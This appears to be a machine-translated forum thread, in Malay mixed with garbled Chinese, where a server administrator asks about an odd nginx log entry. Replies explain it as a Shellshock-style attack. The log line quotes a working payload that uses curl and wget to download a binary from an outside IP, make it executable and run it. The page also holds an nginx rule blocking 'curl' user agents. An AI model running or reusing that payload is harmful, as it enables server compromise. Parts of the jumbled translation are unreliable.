Hari ini saya secara tidak sengaja menemui log yang sangat pelik dalam access.log nginx pada pelayan syarikat:
61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"Apabila datang ke tempat pelik:
Menggunakan http1.0
ejen pengguna ialah skrip
Saya mencari di Internet dan tidak menemui maklumat tentang menggunakan ejen pengguna untuk menyerang Walaupun saya dapat mendapatkan kod skrip dengan mengikut alamat dalam log, keupayaan saya terhad dan saya tidak dapat menganalisis sasaran serangannya.
Maafkan saya, mana-mana pakar, adakah anda mempunyai maklumat dan pengalaman yang berkaitan? Tolong kongsikan dengan saya, terima kasih banyak! !
Ditambah:
Di bawah konfigurasi nginx apakah ia akan menghuraikan kandungan dalam ejen pengguna?
![[Web front-end] Permulaan pantas Node.js](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
Ini sepatutnya menjadi kelemahan
user-agenthttp1.0pelayan anda mungkin disuntik dengan skrip oleh pihak lain dan ia menyamarkanapachecode> pada anda > perkhidmatan, menukar pelayan anda menjadi ayam dan memanipulasinya untuk menjalankan seranganDDOS, tetapi saya tidak tahu jikanginxakan melaksanakan skripnyahttp1.0的user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginx会不会执行它这个脚本你可以看看你
Anda boleh menyemak alamataccess.log中http://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/ahttp://37.1.202.6/migdalamaccess.loganda. Anda boleh melihat bahawa terdapat failhttp://37.1.202.6/aAnda boleh melihat kod ini.Pengimbas disuntik. . . Ejen Pengguna akan dihuraikan.
`1. Pasang firewall aplikasi
2
jika ($http_user_agent ~* 'curl') #Konfigurasikan ejen pengguna yang ditolak.
{
kembali 403;
}
`
Satu perenggan
perl脚本,作用就是 伪装成ApacheKemudian terima arahan untuk melakukan sesuatu. . . Betul, menangkap ayam daging.